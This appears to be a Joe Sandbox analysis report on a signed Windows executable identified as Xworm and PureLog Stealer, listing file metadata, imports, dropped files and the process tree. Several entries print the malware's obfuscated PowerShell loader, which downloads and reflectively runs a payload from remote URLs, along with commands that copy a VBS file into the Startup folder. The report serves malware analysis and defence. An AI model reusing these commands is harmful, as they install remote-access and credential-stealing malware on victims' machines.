SHA256:	3658f44acb4d331fa89ab43d782bee2a97a48b2f425cad29939ee472c74bc62f
SHA512:	56a9431edccdd5a3d3b80080880933fd3d269a2ca4c6b23040b9c07b24562827e61350ec358c5d348cda7b6b2dade9c8c0971b955bf5d4142d931bff7e78ad0f
SSDEEP:	49152:d9tR0P0lj0UcVJhxFNj9YJZ5UecgNAWXvR2FC:VXTvOgZM0
TLSH:	13B54B12F74149EAC469C17482469732BAB1B84D0734BBDF1BD48A323E56FD16F3C6A8
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.R./.../.../..F].../..F].../..F].../......./......./......./..RZ.../..F].../.../..j/......./.../..r/....s../......./..Rich./.

Entrypoint:	0x14014fb68
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F106C8 [Mon Sep 23 06:12:24 2024 UTC]
TLS Callbacks:	0x40136490, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	5d3da2bd2cc29f4b0794a2c94a699c9d

Signature Valid:	true
Signature Issuer:	CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	13/09/2024 13:25:00 13/09/2025 13:24:59
Subject Chain	CN="Guangdong Kenuosi IoT Network Technology Co., Ltd.", O="Guangdong Kenuosi IoT Network Technology Co., Ltd.", L=Dongguan, S=Guangdong, C=CN, SERIALNUMBER=91441900MA54J07X80, OID.1.3.6.1.4.1.311.60.2.1.1=Dongguan, OID.1.3.6.1.4.1.311.60.2.1.2=Guangdong, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	79FE43166E2E2369A1B401BB93282D31
Thumbprint SHA-1:	8939F7E15BAAD7662495E6DCCFC1D320F25F7558
Thumbprint SHA-256:	381F86A2CF7BF08BBAAE5BCB1AFF881103460697B385BC93FFBBA8AAF2FFD3E2
Serial:	6116881CBADD579E680B600873B3A8E3

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x21b5ec	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x22d000	0xc4f8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x223000	0x9738	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x23ac00	0x2918	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x23a000	0x4c3c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x212860	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x212a80	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x212720	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x16c000	0x5c8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x16a8c0	0x16aa00	e5dd69073209e54982e5250ed71f175a	False	0.48192029688038607	data	6.2685137698935485	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x16c000	0xb0a86	0xb0c00	fb2cb01154070fbe73f07aeb753458be	False	0.33911443599717117	data	5.240514913478381	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x21d000	0x5900	0x4600	0f7748ba356f5c06462c32da0455c2b2	False	0.26010044642857144	data	3.1232061749104605	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x223000	0x9738	0x9800	185e728e776c787d868369e5781a2a75	False	0.5126439144736842	data	5.994892359378369	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x22d000	0xc4f8	0xc600	cfc7abbee70af9857cccbed7d2a7c6a3	False	0.23368450126262627	data	4.491215593239789	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x23a000	0x4c3c	0x4e00	6e6bbff894847e643b4fa77738ab2cf2	False	0.43083934294871795	data	5.424401520464055	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x22d418	0x18de	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9696826892868363
RT_ICON	0x22ecf8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.08974964572508266
RT_ICON	0x232f20	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.12935684647302906
RT_ICON	0x2354c8	0x1a68	Device independent bitmap graphic, 40 x 80 x 32, image size 6720	English	United States	0.16553254437869822
RT_ICON	0x236f30	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.21106941838649157
RT_ICON	0x237fd8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.29508196721311475
RT_ICON	0x238960	0x6b8	Device independent bitmap graphic, 20 x 40 x 32, image size 1680	English	United States	0.33313953488372094
RT_ICON	0x239018	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.4592198581560284
RT_GROUP_ICON	0x239480	0x76	data	English	United States	0.7457627118644068
RT_VERSION	0x22d240	0x1d4	data	English	United States	0.49786324786324787

DLL	Import
bcryptprimitives.dll	ProcessPrng
api-ms-win-core-synch-l1-2-0.dll	WakeByAddressAll, WakeByAddressSingle, WaitOnAddress
ADVAPI32.dll	RegOpenKeyExW, RegQueryValueExW, RegCloseKey
KERNEL32.dll	GetCurrentThreadId, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, InitializeSListHead, CloseHandle, GetSystemTimeAsFileTime, QueryPerformanceCounter, QueryPerformanceFrequency, GetCurrentProcess, DuplicateHandle, SetHandleInformation, PostQueuedCompletionStatus, CreateIoCompletionPort, GetQueuedCompletionStatusEx, ReadFile, GetOverlappedResult, WriteFile, SetFileCompletionNotificationModes, Sleep, GetModuleHandleA, GetProcAddress, FreeEnvironmentStringsW, DeleteProcThreadAttributeList, CompareStringOrdinal, GetLastError, AddVectoredExceptionHandler, SetThreadStackGuarantee, GetCurrentThread, SwitchToThread, CreateWaitableTimerExW, SetWaitableTimer, WaitForSingleObject, GetSystemInfo, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetLastError, GetCurrentDirectoryW, GetEnvironmentStringsW, GetEnvironmentVariableW, GetCommandLineW, FlushFileBuffers, SetFileInformationByHandle, SetFilePointerEx, GetStdHandle, GetCurrentProcessId, WriteFileEx, SleepEx, GetExitCodeProcess, TerminateProcess, HeapFree, HeapReAlloc, lstrlenW, ReleaseMutex, GetProcessHeap, HeapAlloc, FindNextFileW, FindClose, CreateFileW, GetFileInformationByHandle, GetFileInformationByHandleEx, CreateDirectoryW, FindFirstFileW, GetFinalPathNameByHandleW, CreateEventW, CancelIo, GetConsoleMode, GetFileType, GetModuleHandleW, FormatMessageW, GetModuleFileNameW, SetEnvironmentVariableW, ExitProcess, CreateNamedPipeW, ReadFileEx, WaitForMultipleObjects, GetFullPathNameW, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, MultiByteToWideChar, WriteConsoleW, WideCharToMultiByte, CreateThread, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, IsDebuggerPresent, GetConsoleOutputCP, GetStartupInfoW, HeapSize, LCMapStringW, CompareStringW, FlsFree, FlsSetValue, FlsGetValue, FlsAlloc, GetStringTypeW, SetStdHandle, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindFirstFileExW, GetCommandLineA, GetModuleHandleExW, RtlPcToFileHeader, LoadLibraryExW, FreeLibrary, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, RaiseException, EncodePointer, RtlUnwindEx, UnhandledExceptionFilter
secur32.dll	ApplyControlToken, FreeCredentialsHandle, AcquireCredentialsHandleA, QueryContextAttributesW, DecryptMessage, InitializeSecurityContextW, FreeContextBuffer, AcceptSecurityContext, EncryptMessage, DeleteSecurityContext
ws2_32.dll	WSASocketW, getsockname, getpeername, WSACleanup, WSAStartup, getaddrinfo, freeaddrinfo, bind, WSAGetLastError, WSAIoctl, setsockopt, WSASend, send, recv, shutdown, getsockopt, ioctlsocket, connect, closesocket
crypt32.dll	CertAddCertificateContextToStore, CertEnumCertificatesInStore, CertGetCertificateChain, CertVerifyCertificateChainPolicy, CertFreeCertificateContext, CertDuplicateCertificateContext, CertDuplicateStore, CertOpenStore, CertDuplicateCertificateChain, CertFreeCertificateChain, CertCloseStore
ntdll.dll	NtWriteFile, RtlNtStatusToDosError, NtDeviceIoControlFile, NtReadFile, NtCreateFile, NtCancelIoFileEx

Target ID:	0
Start time:	06:36:17
Start date:	25/09/2024
Path:	C:\Users\user\Desktop\TM3utH2CsU.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\TM3utH2CsU.exe"
Imagebase:	0x7ff6819e0000
File size:	2'348'312 bytes
MD5 hash:	2B39077634E7172489D66ED8E66AE63A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	06:36:20
Start date:	25/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd" /C start C:\Users\Public\Documents\privacy_policy.pdf
Imagebase:	0x7ff682e10000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	06:36:21
Start date:	25/09/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff63ec50000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	18
Start time:	06:36:36
Start date:	25/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)\|invOKe-exPReSSiON"
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000012.00000002.2481504661.000001AF314E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000012.00000002.1728472486.000001AF2930E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Target ID:	24
Start time:	06:36:38
Start date:	25/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)\|invOKe-exPReSSiON"
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	28
Start time:	06:36:39
Start date:	25/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	30
Start time:	06:36:40
Start date:	25/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)\|invOKe-exPReSSiON"
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	36
Start time:	06:36:42
Start date:	25/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Imagebase:	0x7ff682e10000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	42
Start time:	06:36:43
Start date:	25/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Imagebase:	0x7ff682e10000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TM3utH2CsU.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Documents\32.zip

C:\Users\Public\Documents\32\hnvc.vbs

C:\Users\Public\Documents\32\pure_hnvc.bat

C:\Users\Public\Documents\pow.zip

C:\Users\Public\Documents\pow\wm.vbs

C:\Users\Public\Documents\pow\wm_startup.bat

C:\Users\Public\Documents\privacy_policy.pdf

C:\Users\Public\Documents\sys.zip

Windows Analysis Report
TM3utH2CsU.exe

Target ID:	45
Start time:	06:36:44
Start date:	25/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat""
Imagebase:	0x7ff682e10000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	50
Start time:	06:36:45
Start date:	25/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Imagebase:	0x7ff682e10000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	53
Start time:	06:36:47
Start date:	25/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd" /C echo %username%
Imagebase:	0x7ff682e10000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	59
Start time:	06:36:48
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	61
Start time:	06:36:49
Start date:	25/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat""
Imagebase:	0x7ff682e10000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	63
Start time:	06:36:50
Start date:	25/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_sys.bat" "
Imagebase:	0x7ff682e10000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	67
Start time:	06:36:51
Start date:	25/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat""
Imagebase:	0x7ff682e10000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	71
Start time:	06:36:52
Start date:	25/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	73
Start time:	06:36:53
Start date:	25/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd" /C echo %username%
Imagebase:	0x7ff682e10000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	76
Start time:	06:36:56
Start date:	25/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true